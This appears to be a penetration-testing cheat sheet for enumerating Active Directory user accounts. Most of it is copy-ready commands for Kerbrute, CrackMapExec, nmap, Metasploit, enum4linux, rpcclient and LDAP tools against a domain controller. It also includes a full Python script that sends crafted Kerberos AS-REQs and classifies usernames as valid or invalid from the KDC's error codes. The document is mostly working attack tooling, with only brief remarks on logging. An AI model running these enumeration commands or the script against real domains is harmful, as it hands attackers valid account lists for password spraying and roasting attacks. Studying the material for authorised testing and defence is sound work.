User Enumeration
Kerbrute
To enumerate usernames, Kerbrute sends AS-REQs (TGT requests) that carry no pre-authentication data. If the KDC answers with KDC_ERR_C_PRINCIPAL_UNKNOWN, the username does not exist. If it answers with KDC_ERR_PREAUTH_REQUIRED, the username exists and we move on (an account with "Do not require Kerberos preauthentication" set answers with an AS-REP straight away, so it is both valid and AS-REP roastable). No password is ever tried, so this is not a failed logon and will not lock out any accounts. It does generate Windows event ID 4768 (Kerberos authentication ticket requested) on the DC if Kerberos authentication service auditing is enabled.
kerbrute userenum -d rezydev.local --dc 10.10.10.10 usernames.txt
## Only Output Usernames (with RegEx)
kerbrute userenum -d rezydev.local --dc 10.10.10.10 usernames.txt | grep -oP '(?<=VALID USERNAME:\t )[^@]+'
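Added example, not part of the original notes and not Kerbrute's own code: a small Python script that does exactly what the paragraph above describes, so the decision logic is visible. It hand-encodes an AS-REQ with no PA-DATA, sends it to port 88/TCP, and classifies the reply purely on the KRB-ERROR error-code (6 = unknown principal, 25 = pre-auth required, 18 = exists but disabled/locked, or an AS-REP if pre-auth is off). The realm REZYDEV.LOCAL and the sample KRB-ERROR replies are constructed for the offline demo, not captured traffic; the only external dependency is a reachable KDC when you pass a DC, realm and wordlist on the command line.

```python
"""AS-REQ pre-auth user enumeration (the Kerbrute technique), added example."""
import random
import socket
import struct
import sys
import time

# KRB-ERROR codes that matter for enumeration (RFC 4120, section 7.5.9)
KDC_ERR_C_PRINCIPAL_UNKNOWN = 6   # no such principal -> username does not exist
KDC_ERR_CLIENT_REVOKED = 18       # principal exists but is disabled or locked out
KDC_ERR_PREAUTH_REQUIRED = 25     # principal exists, KDC wants pre-authentication

# --- minimal DER encoder for the handful of types an AS-REQ needs ---
def der_len(n):
    if n < 0x80:
        return bytes([n])
    b = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(b)]) + b

def tlv(tag, body):       return bytes([tag]) + der_len(len(body)) + body
def seq(*items):          return tlv(0x30, b"".join(items))
def ctx(n, body):         return tlv(0xA0 | n, body)   # [n] context-specific tag
def app(n, body):         return tlv(0x60 | n, body)   # APPLICATION n tag
def gen_string(s):        return tlv(0x1B, s.encode())  # KerberosString
def integer(v):           return tlv(0x02, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))
def principal(name_type, *names):
    return seq(ctx(0, integer(name_type)), ctx(1, seq(*[gen_string(n) for n in names])))

def build_as_req(user, realm):
    """AS-REQ with no padata: the KDC must say something about cname before any auth happens."""
    till = time.strftime("%Y%m%d%H%M%SZ", time.gmtime(time.time() + 86400))
    body = seq(
        ctx(0, tlv(0x03, b"\x00\x40\x81\x00\x10")),   # kdc-options: forwardable, renewable, canonicalize, renewable-ok
        ctx(1, principal(1, user)),                   # cname, NT-PRINCIPAL
        ctx(2, gen_string(realm)),                    # realm
        ctx(3, principal(2, "krbtgt", realm)),        # sname, NT-SRV-INST
        ctx(5, tlv(0x18, till.encode())),             # till, GeneralizedTime
        ctx(7, integer(random.randrange(1, 2 ** 31))),  # nonce
        ctx(8, seq(integer(18), integer(17), integer(23))),  # etypes: AES256, AES128, RC4
    )
    return app(10, seq(ctx(1, integer(5)), ctx(2, integer(10)), ctx(4, body)))  # pvno 5, msg-type AS-REQ

# --- minimal DER reader, enough to pull error-code out of a KRB-ERROR ---
def der_read(buf, pos=0):
    """Return (tag, body, next_pos) for the TLV starting at pos."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def krb_error_code(msg):
    tag, body, _ = der_read(msg)
    if tag != 0x7E:                        # APPLICATION 30 = KRB-ERROR
        raise ValueError("not a KRB-ERROR")
    _, fields, _ = der_read(body)          # the outer SEQUENCE
    pos = 0
    while pos < len(fields):
        tag, val, pos = der_read(fields, pos)
        if tag == 0xA6:                    # [6] error-code INTEGER
            return int.from_bytes(der_read(val)[1], "big", signed=True)
    raise ValueError("KRB-ERROR without error-code")

def classify(msg):
    """Map a KDC reply to (verdict, reason); verdict is 'valid', 'invalid' or 'unknown'."""
    if msg[0] == 0x6B:                     # APPLICATION 11 = AS-REP: no pre-auth needed at all
        return "valid", "AS-REP returned without pre-auth (AS-REP roastable)"
    code = krb_error_code(msg)
    if code == KDC_ERR_C_PRINCIPAL_UNKNOWN:
        return "invalid", "KDC_ERR_C_PRINCIPAL_UNKNOWN"
    if code == KDC_ERR_PREAUTH_REQUIRED:
        return "valid", "KDC_ERR_PREAUTH_REQUIRED"
    if code == KDC_ERR_CLIENT_REVOKED:
        return "valid", "KDC_ERR_CLIENT_REVOKED (disabled or locked out)"
    return "unknown", f"error-code {code}"

def recv_exact(s, n):
    buf = b""
    while len(buf) < n:
        chunk = s.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("KDC closed the connection")
        buf += chunk
    return buf

def send_as_req(kdc, realm, user, timeout=5):
    """Kerberos over TCP: a 4-byte big-endian length prefix in both directions."""
    req = build_as_req(user, realm)
    with socket.create_connection((kdc, 88), timeout=timeout) as s:
        s.sendall(struct.pack(">I", len(req)) + req)
        (n,) = struct.unpack(">I", recv_exact(s, 4))
        return recv_exact(s, n)

def sample_krb_error(code, realm="REZYDEV.LOCAL"):
    """Constructed KRB-ERROR for the offline demo (not a capture); only the fields the parser needs."""
    return app(30, seq(ctx(0, integer(5)), ctx(1, integer(30)), ctx(6, integer(code)),
                       ctx(9, gen_string(realm)), ctx(10, principal(2, "krbtgt", realm))))

if __name__ == "__main__":
    if len(sys.argv) == 4:                 # usage: enum.py <dc_ip> <REALM> usernames.txt
        kdc, realm, path = sys.argv[1:]
        for user in (line.strip() for line in open(path) if line.strip()):
            verdict, why = classify(send_as_req(kdc, realm, user))
            if verdict != "invalid":
                print(f"{verdict:8} {user}@{realm}  ({why})")
    else:                                  # offline: classify the constructed replies
        for code in (KDC_ERR_PREAUTH_REQUIRED, KDC_ERR_C_PRINCIPAL_UNKNOWN, KDC_ERR_CLIENT_REVOKED):
            print(code, classify(sample_krb_error(code)))
```

Every request here shows up as a 4768 on the DC, one per candidate name, so a large wordlist is noisy even though nothing is ever locked out; the classify() split is the same one Kerbrute applies to its own responses.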
Crackmapexec
## Credentialed
sudo crackmapexec smb 10.10.10.10 -u rezydev -p Password123@ --users
sudo crackmapexec smb 10.10.10.10 -u rezydev -p Password123@ --users | grep -oP '(?<=\\)[^ \t:]+'
## Extra: We can use --groups to enumerate domain groups.
## SMB NULL Session (take the name after the domain\ backslash rather than an awk column number, which shifts between CME versions)
crackmapexec smb rezydev.local -u '' -p '' --users | grep -oP '(?<=\\)[^ \t:]+' | sort -u
## LDAP Anonymous
crackmapexec ldap 10.10.10.10 --anon --users
Nmap
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" 10.10.10.10
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=usernames.txt 10.10.10.10
Metasploit
msf> use auxiliary/gather/kerberos_enumusers
msf> set RHOSTS 10.10.10.10
msf> set DOMAIN rezydev.local
msf> set USER_FILE usernames.txt
msf> run
enum4linux
# SMB NULL Session is required
enum4linux -U 10.10.10.10 | grep -oP '(?<=user:\[)[^\]]+'
RPCClient
# SMB NULL Session is required
rpcclient -U "" -N 10.10.10.10
$> enumdomusers # Lists domain users as user:[name] rid:[0x...]
LDAP Anonymous
## [LDAPSEARCH]
## -x is a simple bind; with no -D/-w it is an anonymous bind. (objectClass=user) alone also matches computer accounts in AD, so restrict it to person objects
ldapsearch -x -H ldap://10.10.10.10 -b "DC=domain,DC=com" "(&(objectCategory=person)(objectClass=user))" sAMAccountName displayName userPrincipalName
## [LDAPDOMAINDUMP]
## No -u means an anonymous bind; note -d is ldapdomaindump's CSV delimiter option, not the domain, and the DC is the only positional argument
ldapdomaindump --no-pass <DC_IP>
## Each entry in the JSON is {"attributes": {...}, "dn": "..."}
jq '.[].attributes | {sAMAccountName, userPrincipalName}' domain_users.json
## [WINDAPSEARCH]
python3 windapsearch.py --dc-ip 10.10.10.10 -u "" -U
## Using PowerShell (DirectorySearcher, if anonymous bind is allowed). A bare [ADSI]"LDAP://..." binds with the current user's credentials, so request an anonymous bind explicitly
$root = New-Object System.DirectoryServices.DirectoryEntry("LDAP://<DC_IP>", $null, $null, [System.DirectoryServices.AuthenticationTypes]::Anonymous)
$ldap = New-Object System.DirectoryServices.DirectorySearcher($root)
$ldap.Filter = "(&(objectCategory=person)(objectClass=user))"
$ldap.PropertiesToLoad.AddRange(@("sAMAccountName", "displayName", "mail"))
$ldap.PageSize = 1000   # paged results; AD caps an unpaged search at MaxPageSize (1000 by default)
$ldap.FindAll() | ForEach-Object { $_.Properties["samaccountname"][0] }   # property keys come back lowercase